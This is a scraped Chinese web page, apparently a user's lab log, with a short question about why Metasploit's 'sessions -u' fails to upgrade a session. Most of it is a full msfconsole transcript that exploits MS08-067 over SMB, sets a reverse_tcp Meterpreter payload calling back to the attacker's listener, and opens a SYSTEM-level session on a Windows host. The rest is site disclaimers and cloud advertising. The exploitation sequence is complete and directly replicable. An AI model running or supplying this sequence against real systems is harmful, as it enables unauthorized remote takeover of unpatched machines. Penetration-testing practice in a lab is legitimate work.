metasploit將命令列shell升級為meterpreter

來源:互聯網
上載者:User
msf > use exploit/windows/smb/ms08_067_netapimsf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf  exploit(ms08_067_netapi) > set TARGET 41TARGET => 41msf  exploit(ms08_067_netapi) > setg LHOST 192.168.1.11LHOST => 192.168.1.11msf  exploit(ms08_067_netapi) > setg LPORT 8080LPORT => 8080msf  exploit(ms08_067_netapi) > setg RHOST 192.168.1.142RHOST => 192.168.1.142msf  exploit(ms08_067_netapi) > exploit -z[*] Started reverse handler on 192.168.1.11:8080 [*] Attempting to trigger the vulnerability...[*] Sending stage (752128 bytes) to 192.168.1.142[*] Meterpreter session 1 opened (192.168.1.11:8080 -> 192.168.1.142:1074) at 2013-04-28 10:44:36 -0400[*] Session 1 created in the background.msf  exploit(ms08_067_netapi) > sessions -lActive sessions===============  Id  Type                   Information                            Connection  --  ----                   -----------                            ----------  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ROOT-9743DD32E3  192.168.1.11:8080 -> 192.168.1.142:1074 (192.168.1.142)msf  exploit(ms08_067_netapi) > sessions -u 1[-] Session 1 is not a command shell session.msf  exploit(ms08_067_netapi) > sessions -i 1[*] Starting interaction with 1...meterpreter > 


sessions -u 1不起作用啊。

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.